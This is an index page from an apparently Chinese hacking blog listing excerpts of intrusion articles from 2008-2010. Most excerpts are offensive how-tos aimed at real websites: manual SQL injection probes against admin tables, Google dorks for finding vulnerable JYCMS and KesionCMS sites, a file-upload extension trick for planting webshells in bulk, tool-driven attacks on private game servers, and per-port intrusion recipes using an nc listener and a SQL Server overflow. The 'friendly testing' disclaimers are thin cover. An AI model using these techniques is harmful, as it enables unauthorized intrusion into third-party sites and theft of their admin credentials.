现在的位置:首页 > 所有关于入侵的文章
0

百度是如何被入侵的? 图解

作者:逝魂  发表于:2010年01月19日 20:27  分类:网络共享  1573 次浏览 
百度是如何被入侵的? 图解

就是DNS出的问题,图很明白.随便看下

阅读全文...Tags: ,

2

2010.1.12百度被黑(DNS被劫持) ,历史回顾

作者:逝魂  发表于:2010年01月12日 12:47  分类:杂七杂八  1537 次浏览 
2010.1.12百度被黑(DNS被劫持) ,历史回顾

一、2006年9月12日(17时30分至18时)——半小时 2006年9月12日傍晚5时30分左右,有北京、重庆等地的网友称从当天17时30分开始,百度无法正常使用。在对百度服务器执行“Ping”命令时发现域名丢包率达到100%,返回了“请求超时”的信息。 随后,百度网站“www.baidu.com”,发现首页能正常登录,但搜索内容时,速度极慢,近10秒钟后网页最终出现无法显示的页面。在记者调查下,该时段,百度网站在北京、重庆、广州、长沙等地,都出现无法访问的现象。直到下午6时,百度网站才恢复正...

阅读全文...Tags: ,

1

怕工具有毒,那就学手工注入

作者:逝魂  发表于:2009年11月17日 21:13  分类:网络共享  1361 次浏览 
怕工具有毒,那就学手工注入

1 判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) —判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select co...

阅读全文...Tags:

1

入侵捷扬文章系统 SQL注入漏洞

作者:逝魂  发表于:2009年10月15日 21:33  分类:网络共享  1673 次浏览 
入侵捷扬文章系统 SQL注入漏洞

首先google搜索jycms.com,有很多,后面的基本都能利用。随便选一个,在域名后面加入webad/ads.asp?priceid=2 ,即注入页面,发现有图片出现就说明可以注入。 然后复制地址放到明小子里破解,明小子默认是没有列名的,所以必须添加两个列名,分别是 “a_user”,”a_pass”。然后点猜解内容,破出用户名和md5密码,然后去解密md5, 最后进后台,默认的后台是Manage/admin_login.asp,OK了 至于怎么拿webshell、权限我就不演示了,友情检测,切勿破...

阅读全文...Tags:

1

入侵科讯系统批量拿webshell

作者:逝魂  发表于:2009年10月09日 13:54  分类:网络共享  1724 次浏览 
入侵科讯系统批量拿webshell

首先Google搜索 Powered By KesionCMS V5.5 inurl:User/UserReg.asp 或inurl:User/UserReg.asp intitle:新会员注册 注册用户后,然后直接跳KS_Editor/SelectUpFiles.asp页面,上传大马,注意大马后缀名为x.asp;x.jpg的格式,自动命名的钩选上,然后查看源文件,找到路径就OK 原作可能是んㄗ葑訫鎖愛 , 提醒一下,这种入侵基本站点都被人轮了遍,只是提供思路,尝试还要小心有心人挂马,我们只是友情检测。

阅读全文...Tags: ,

1

实战入侵传奇私服

作者:逝魂  发表于:2009年10月07日 10:30  分类:网络共享  1773 次浏览 
实战入侵传奇私服

首先打开强大的google搜索引擎 点高级 输入 “传奇 inurl:news_more.asp?lm” 每页显示100条 随便找一个是传奇私服的站 记下域名 然后打开工具 : 输入域名(不带http://),和webshell名称 点击入侵就好了 ,有些站不能入侵就换一个。看图  密码是:www.baidu.com 可以拿权限。 OK 工具及思路由iollcy提供动画下载地址:点击下载 工具下载地址:点击下载 PS :工具已经失效,停止下载.

阅读全文...Tags:

0

各个端口的入侵方法(入侵菜鸟必看)

作者:逝魂  发表于:2009年09月04日 14:30  分类:学习天地  1518 次浏览 
各个端口的入侵方法(入侵菜鸟必看)

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 ============================= 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.ex...

阅读全文...Tags:

0

入侵XP常用的七种方法

作者:逝魂  发表于:2008年08月25日 12:03  分类:学习天地  1540 次浏览 
入侵XP常用的七种方法

本文介绍黑客入侵Windows XP的几个常用方法,提醒用户小心防备。   第一招、屏幕保护   在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。   提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ct...

阅读全文...Tags:

0

远程桌面连接超出最大连接数解决办法

作者:逝魂  发表于:2008年07月24日 14:55  分类:学习天地  1559 次浏览 
远程桌面连接超出最大连接数解决办法

Windows服务器远程桌面连接受连接数限制,总会发生“超出最大连接数”问题,以下2个方法可以从短期和长期两个方面解决这个情况: 一、当服务器已经出现不允许远程链接时候远程注销登录用户可使用下面的命令: mstsc /console /v:IP:远程端口 (如:mstsc /console /v:222.222.222.222:2222) 二、重新进入服务器设置 1.开始-运行-gpedit.msc-计算机配置-管理模板-windows组件-终端服务-会话 右边窗口选择 为断开的会话设置时间限制 -选择已启用,选择一个时间 2.建...

阅读全文...Tags: ,

0

入侵最常用的弱口令

作者:逝魂  发表于:2008年06月27日 12:16  分类:学习天地  1913 次浏览 
入侵最常用的弱口令

大家可以核查一下自己操作系统是否有这样的密码: .data:0040A038 dd offset aAdmin ; “admin” .data:0040A03C dd offset aAdmin_0 ; “Admin” .data:0040A040 dd offset aPassword ; “password” .data:0040A044 dd offset aPassword_0 ; “Password” .data:0040A048 dd offset a1 ; “1″ .dat...

阅读全文...Tags: ,

  • 学习天地
  • 日记
  • 杂七杂八
  • 网站公告
  • 网络共享
  • 留言板
  • 更多
    • Copyright 2009-2012 gtsow.com All rights reserved. Design by Weisay
    | WordPress | RSS | |